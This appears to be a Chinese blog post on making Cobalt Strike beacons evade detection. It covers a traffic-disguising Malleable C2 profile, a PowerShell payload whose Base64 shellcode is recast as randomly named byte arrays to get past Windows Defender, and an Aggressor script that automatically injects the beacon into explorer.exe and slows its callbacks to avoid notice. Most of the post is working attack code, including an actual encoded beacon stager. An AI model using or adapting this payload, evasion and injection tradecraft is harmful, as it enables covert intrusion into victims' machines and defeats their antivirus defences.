Malleable2 C2配置
首先,我从一开始就踩了个坑,CS不应该是个开箱即用的东西吗,仔细一想,不对,那样的话流量特征不就明明白白了吗,这里需要用到Malleable C2 Profile。
Malleable Command and Control可拓展的命令和控制
M主要用来控制Cobalt Strike Beacon攻击载荷中的网络参数,也就是说我们可以通过这个伪装/混淆我们的流量。在一些复杂场景中可以更好的规避防火墙。
这里有一个Github项目Malleable-C2里面有现成的配置文件,你也可以自己改一个,我选择了之前学长发我的一份伪装成某度的配置文件进行使用。
如果不用这个混淆流量的话,CS造的PowerShell的马即使能免杀,在后续下发指令的时候也会被Windows Defender给杀掉。
在Listener里面我们也要使用https这种加密的流量,更好绕过防火墙
PowerShell免杀
首先,我们对生成的Payload进行一定研究,发现FromBase64String这个函数应该是被拉黑了,只要处理到这个就报毒。所以我们可以吧Base64转换为字节码的形式进行绕过。
示例如下
#Base64
[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbKsCMjI3lrquJim5giIyNuEupicmJySSBicmKZdKq85dz2yFp4a6riaxLxaqr7bhLqcUsjEeOncXFimch2DRjc9muq5Wug4HNJKXxrqtKZPCMjI0kjS6MQIyNqqsNimicjIyNimVZlvaXc9muq0muq+Wrk49zc3NxuEupxcWKZDiU7WNz2puMspr4iIyNr3Owsp68iIyPIkMrHIiMjy6Hc3NwMWmZmeSMZiB2igppanzPzKbfJJRlTyoktE2nscMHTAIS+bHHl5m/j94zr470Z7uh4ScS0kioVJEmwllHt5njNKhTkeLayeow+4o2TcENKI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxITDRMYA3RKTUdMVFADbXcDFQ0RGAN0bHQVFxgDd1FKR0ZNVwwVDRMYA3dMVkBLGANuYm9gaXAKLikjAikoLPonSzhbqQDoC5KwV9PMupbmG49FOlnPw2VqyA74Y46b6zCUIZgHz5/a7bH42YCNxRUm5b/XUiSBe1Ch/9Oq9MQqRPZkwCCT88HLQU32K+4oDoRh5ZrUEut7YQFkTuF/kadzF3Wjao01O3MA9AFfJWl+uN5PDAJnRNLW0cPG8yUr8HG7zmK1bVvluiN9CFEKPyTROTyywfn5CPQ0iv1mc0HBNAUmyOGV+z3P4tv3eO7RhmzDlnzzlGtkFgim7UyQ7gqeEQWheiNindOWgXXc9msS6pkjI2MjYpsjMyMjYppjIyMjYpl7h3DG3PZrsHBwa6rEa6rSa6r5YpsjAyMjaqraYpkxtarB3PZroOcDpuNXlUWoJGsi4KbjVvR7e3trJiMjIyNz4Mtc3tzcEhoRDRIVGw0REBoNERcaIxn9S5I=')
#字节码混淆后
[Byte[]]$PRZNAMJgM = [Byte[]](223,107,160,199,211,203,235,35,35,35,98,114,98,115,113,114,117,107,18,241,70,107,168,113,67,107,168,113,59,107,168,113,3,107,168,81,115,107,44,148,105,105,110,18,234,107,18,227,143,31,66,95,33,15,3,98,226,234,46,98,34,226,193,206,113,98,114,107,168,113,3)
[Byte[]]$qXHbRRolRZZT = [Byte[]](168,97,31,107,34,243,69,162,91,59,40,33,86,81,168,163,171,35,35,35,107,166,227,87,68,107,34,243,115,168,107,59,103,168,99,3,106,34,243,192,117,107,220,234,98,168,23,171,107,34,245,110,18,234,107,18,227,143,98,226,234,46,98,34,226,27,195,86,210,111,32)
[Byte[]]$ckKZjMGmMr = [Byte[]](111,7,43,102,26,242,86,251,123,103,168,99,7,106,34,243,69,98,168,47,107,103,168,99,63,106,34,243,98,168,39,171,107,34,243,98,123,98,123,125,122,121,98,123,98,122,98,121,107,160,207,3,98,113,220,195,123,98,122,121,107,168,49,202,108,220,220,220,126,73,35)
[Byte[]]$vvTYnbPAP = [Byte[]](106,157,84,74,77,74,77,70,87,35,98,117,106,170,197,111,170,210,98,153,111,84,5,36,220,246,107,18,234,107,18,241,110,18,227,110,18,234,98,115,98,115,98,153,25,117,90,132,220,246,202,176,35,35,35,121,107,170,226,98,155,152,34,35,35,110,18,234,98,114,98)
[Byte[]]$oDOZGtzgSPfbKla = [Byte[]](114,73,32,98,114,98,153,116,170,188,229,220,246,200,90,120,107,170,226,107,18,241,106,170,251,110,18,234,113,75,35,17,227,167,113,113,98,153,200,118,13,24,220,246,107,170,229,107,160,224,115,73,41,124,107,170,210,153,60,35,35,35,73,35,75,163,16,35,35,106,170)
[Byte[]]$gufwnOAtfMhSa = [Byte[]](195,98,154,39,35,35,35,98,153,86,101,189,165,220,246,107,170,210,107,170,249,106,228,227,220,220,220,220,110,18,234,113,113,98,153,14,37,59,88,220,246,166,227,44,166,190,34,35,35,107,220,236,44,167,175,34,35,35,200,144,202,199,34,35,35,203,161,220,220,220,12)
[Byte[]]$VijLlpTL = [Byte[]](90,102,102,121,35,25,136,29,162,130,154,90,159,51,243,41,183,201,37,25,83,202,137,45,19,105,236,112,193,211,0,132,190,108,113,229,230,111,227,247,140,235,227,189,25,238,232,120,73,196,180,146,42,21,36,73,176,150,81,237,230,120,205,42,20,228,120,182,178,122,140)
[Byte[]]$qmNNXvweeMJMH = [Byte[]](62,226,141,147,112,67,74,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,18,19,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,17,24)
[Byte[]]$uJyFfILlJHJfVoEZhHkrFaMHrh = [Byte[]](3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,21,13,19,24,3,119,76,86,64,75,24,3,110,98,111,96,105,112,10,46,41,35,2,41,40,44,250,39,75,56,91,169,0,232,11,146,176,87,211,204,186,150,230,27,143,69,58,89,207,195,101,106,200,14,248)
[Byte[]]$CyVhsFXsPf = [Byte[]](99,142,155,235,48,148,33,152,7,207,159,218,237,177,248,217,128,141,197,21,38,229,191,215,82,36,129,123,80,161,255,211,170,244,196,42,68,246,100,192,32,147,243,193,203,65,77,246,43,238,40,14,132,97,229,154,212,18,235,123,97,1,100,78,225,127,145,167,115,23,117)
[Byte[]]$glxAhgUznZWUI = [Byte[]](163,106,141,53,59,115,0,244,1,95,37,105,126,184,222,79,12,2,103,68,210,214,209,195,198,243,37,43,240,113,187,206,98,181,109,91,229,186,35,125,8,81,10,63,36,209,57,60,178,193,249,249,8,244,52,138,253,102,115,65,193,52,5,38,200,225,149,251,61,207,226)
[Byte[]]$HTAAzLNjfk = [Byte[]](219,247,120,238,209,134,108,195,150,124,243,148,107,100,22,8,166,237,76,144,238,10,158,17,5,161,122,35,98,157,211,150,129,117,220,246,107,18,234,153,35,35,99,35,98,155,35,51,35,35,98,154,99,35,35,35,98,153,123,135,112,198,220,246,107,176,112,112,107,170,196)
[Byte[]]$HeDjjuDz = [Byte[]](107,170,210,107,170,249,98,155,35,3,35,35,106,170,218,98,153,49,181,170,193,220,246,107,160,231,3,166,227,87,149,69,168,36,107,34,224,166,227,86,244,123,123,123,107,38,35,35,35,35,115,224,203,92,222,220,220,18,26,17,13,18,21,27,13,17,16,26,13,17,23)
[Byte[]]$XOdUFuGpKi = [Byte[]](26,35,25,253,75,146)
[Byte[]]$jbMpyHdkOCXCCucode = $PRZNAMJgM + $qXHbRRolRZZT + $ckKZjMGmMr + $vvTYnbPAP + $oDOZGtzgSPfbKla + $gufwnOAtfMhSa + $VijLlpTL + $qmNNXvweeMJMH + $uJyFfILlJHJfVoEZhHkrFaMHrh + $CyVhsFXsPf + $glxAhgUznZWUI + $HTAAzLNjfk + $HeDjjuDz + $XOdUFuGpKi
这里有Github的自动化脚本MyBypassAV_ps1.py,不仅可以转换字节码,也可以用随机字符串混淆函数和变量。
混淆了之后就可以基本免杀了,为什么说是基本呢,因为还是有概率在和C2通讯的时候被杀毒Kill掉(可能流量特征还没清干净吧),所以呢我们要尽早转移进程(也怕被看到一个黑框框在这被关掉了)
所以我在C2配置中将session的sleep时间改成了200ms
在通讯的第一次就设置插件自动转移进程,只要在Client中加载AutoSpawn.cna这个文件即可
他可以在第一次通讯200ms之内将进程迁移至explorer.exe并且将新旧session的sleep时间改成5s避免被发现。
#AutoSpawn.cna
on beacon_initial
{
sub callback
{
$regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
$listener = "https";
if ($2 ismatch $regex)
{
$pid = matched()[1];
$inject_pid = $pid;
if (-is64 $1)
{
$arch = "x64";
}
else
{
$arch = "x86";
}
binject($1, $pid, $listener, $arch);
bsleep($1, 5, 37);
}
}
if($inject_pid != beacon_info($1,"pid"))
{
bps($1, &callback);
}
else{
bsleep($1, 5, 37);
}
}
评论